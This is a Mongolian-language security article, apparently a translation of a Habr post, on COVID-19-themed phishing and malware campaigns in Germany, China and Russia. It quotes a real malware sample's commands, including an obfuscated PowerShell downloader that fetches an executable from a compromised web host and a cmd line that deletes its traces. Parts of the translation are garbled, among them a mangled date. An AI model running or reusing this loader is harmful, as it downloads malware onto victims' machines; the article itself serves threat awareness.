Халдагчид COVID-19-ийн сэдвийг үргэлжлүүлэн ашиглаж, тахал өвчинтэй холбоотой бүх зүйлийг сонирхож буй хэрэглэгчдэд улам бүр олон аюул заналхийлсээр байна. IN Коронавирусын дараа ямар төрлийн хортой програмууд гарч ирсэн талаар бид аль хэдийн ярьсан бөгөөд өнөөдөр янз бүрийн улс орны хэрэглэгчид, тэр дундаа Орос улсад аль хэдийн тулгарч байсан нийгмийн инженерчлэлийн аргуудын талаар ярих болно. Ерөнхий чиг хандлага, жишээнүүд нь захын доор байна.
Санаж байна уу Хүмүүс зөвхөн коронавирус, тахлын явцын талаар төдийгүй санхүүгийн дэмжлэг үзүүлэх арга хэмжээний талаар уншихад бэлэн байгаа талаар бид ярилцсан уу? Сайн жишээ энд байна. Германы Хойд Рейн-Вестфали буюу NRW мужид нэгэн сонирхолтой фишинг халдлагыг илрүүлжээ. Халдагчид Эдийн засгийн яамны вэбсайтын хуулбарыг үүсгэсэн.), хэн ч санхүүгийн тусламж хүсэх боломжтой. Ийм програм үнэхээр байдаг бөгөөд энэ нь скамеруудад ашигтай байсан. Хохирогчдын хувийн мэдээллийг хүлээн авсны дараа тэд яамны вэбсайтад өргөдөл гаргасан боловч бусад банкны мэдээллийг зааж өгсөн. Албан ёсны мэдээллээр уг схемийг илрүүлэх хүртэл 4 мянган ийм хуурамч хүсэлт гаргасан байна. Үүний үр дүнд хохирсон иргэдэд зориулсан 109 сая ам.доллар луйварчдын гарт оржээ.
Та COVID-19-ийн үнэ төлбөргүй шинжилгээ хийлгэхийг хүсч байна уу?
Коронавирусын сэдэвт фишингийн өөр нэг чухал жишээ бол имэйлд. Энэхүү мессежүүд нь коронавирусын халдварын шинжилгээнд үнэ төлбөргүй хамрагдах санал бүхий хэрэглэгчдийн анхаарлыг татсан юм. Эдгээрийн хавсралтад Trickbot/Qakbot/Qbot-ийн тохиолдлууд байсан. Эрүүл мэндээ шалгахыг хүссэн хүмүүс "хавсаргасан маягтыг бөглөж" эхлэх үед компьютерт хортой скрипт татагдсан байна. Хамгаалалтын системүүд ямар ч хорлонтой үйлдэл гарахгүй гэдэгт итгэлтэй болсон үед л хамгаалагдсан хязгаарлагдмал орчинд шалгалт хийхгүйн тулд скрипт нь үндсэн вирусыг татаж эхэлсэн.
Ихэнх хэрэглэгчдийг макро идэвхжүүлэхэд итгүүлэх нь бас хялбар байсан. Үүнийг хийхийн тулд стандарт заль мэхийг ашигласан: санал асуулгын хуудсыг бөглөхийн тулд та эхлээд макро идэвхжүүлэх хэрэгтэй бөгөөд энэ нь VBA скрипт ажиллуулах шаардлагатай гэсэн үг юм.
Таны харж байгаагаар VBA скрипт нь вирусны эсрэг програмаас тусгайлан далдлагдсан байдаг.
Windows-д програм нь өгөгдмөл "Тийм" гэсэн хариултыг хүлээн авахаас өмнө /T <секунд> хүлээдэг хүлээх онцлогтой. Манай тохиолдолд скрипт түр зуурын файлуудыг устгахаас өмнө 65 секунд хүлээсэн:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Хүлээж байхад хортой програм татаж авсан. Үүний тулд тусгай PowerShell скриптийг эхлүүлсэн:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 утгыг тайлсны дараа PowerShell скрипт нь Германаас өмнө нь хакердсан вэб сервер дээр байрлах арын хаалга татаж авдаг:
http://automatischer-staubsauger.com/feature/777777.pngгэсэн нэрээр хадгалдаг:
C:UsersPublictmpdirfile1.exe
хавтас ‘C:UsersPublictmpdir’ командыг агуулсан 'tmps1.bat' файлыг ажиллуулах үед устгагдах болно cmd /c mkdir ""C:UsersPublictmpdir"".
Төрийн байгууллагууд руу чиглэсэн дайралт
Нэмж дурдахад, FireEye-ийн шинжээчид саяхан Ухань дахь засгийн газрын бүтэц, түүнчлэн Хятадын Онцгой байдлын яам руу чиглэсэн APT32 халдлага үйлдсэн гэж мэдээлсэн. Тархсан RTF-н нэг нь Нью Йорк Таймс сонины гарчигтай нийтлэлийн холбоосыг агуулж байсан . Гэсэн хэдий ч үүнийг уншсаны дараа хортой програм татаж авсан (FireEye шинжээчид энэ жишээг METALJACK гэж тодорхойлсон).
Сонирхолтой нь илрүүлэх үед вирусын эсрэг програмуудын аль нь ч энэ тохиолдлыг илрүүлээгүй гэж Virustotal мэдээлэв.
Албан ёсны вэбсайтууд унтарсан үед
Өнгөрсөн өдөр Орост фишинг халдлагын хамгийн тод жишээ болжээ. Үүний шалтгаан нь 3-16 насны хүүхдүүдэд удаан хүлээгдэж буй тэтгэмжийг томилох явдал байв. 12 оны 2020-р сарын XNUMX-ны өдөр өргөдөл хүлээн авч эхэлснийг зарлахад олон сая хүмүүс удаан хүлээсэн тусламжийг авахаар Төрийн үйлчилгээний вэбсайт руу яаран очиж, мэргэжлийн DDoS халдлагаас дордохгүй порталыг устгасан. Ерөнхийлөгч “Төрийн алба өргөдлийн урсгалыг дийлэхгүй байна” гэж хэлэхэд хүмүүс цахим ертөнцөөр өргөдөл хүлээн авах өөр сайт нээх тухай ярьж эхэлсэн.
Асуудал нь хэд хэдэн сайтууд нэгэн зэрэг ажиллаж эхэлсэн бөгөөд нэг нь posobie16.gosuslugi.ru сайтын жинхэнэ програмыг хүлээн авдаг. .
SearchInform-ийн хамт олон .ru бүсээс 30 орчим шинэ луйврын домэйн олжээ. “Infosecurity” болон “Softline” компани дөрөвдүгээр сарын эхнээс хойш ижил төстэй 70 гаруй төрийн үйлчилгээний цахим хуудсыг илрүүлжээ. Тэдний бүтээгчид танил тэмдэгтүүдийг хувиргаж, госуслуги, госуслуги-16, выплати, ковид-выплати, пособие гэх мэт үгсийн хослолыг ашигладаг.
Хайп ба нийгмийн инженерчлэл
Эдгээр бүх жишээнүүд халдагчид коронавирусын сэдвийг амжилттай мөнгөжүүлж байгааг л баталж байна. Нийгмийн хурцадмал байдал, тодорхойгүй асуудлууд их байх тусам луйварчид чухал мэдээлэл хулгайлах, хүмүүсийг өөрсдөө мөнгөө өгөхийг албадах, эсвэл зүгээр л илүү олон компьютерийг хакердах магадлал нэмэгддэг.
Царт тахал нь бэлтгэлгүй байж болзошгүй хүмүүсийг гэрээсээ бөөнөөр нь ажиллахад хүргэсэн тул хувийн мэдээлэл төдийгүй байгууллагын мэдээлэл эрсдэлд орж байна. Жишээлбэл, саяхан Microsoft 365 (хуучнаар Office 365) хэрэглэгчид фишинг халдлагад өртсөн. Хүмүүс захидлын хавсралт болгон асар их "алдсан" дуут мессеж хүлээн авсан. Гэсэн хэдий ч файлууд нь үнэндээ халдлагын хохирогчдыг илгээсэн HTML хуудас байсан . Үүний үр дүнд нэвтрэх эрхээ алдаж, акаунтын бүх өгөгдөл алдагдсан.
Эх сурвалж: www.habr.com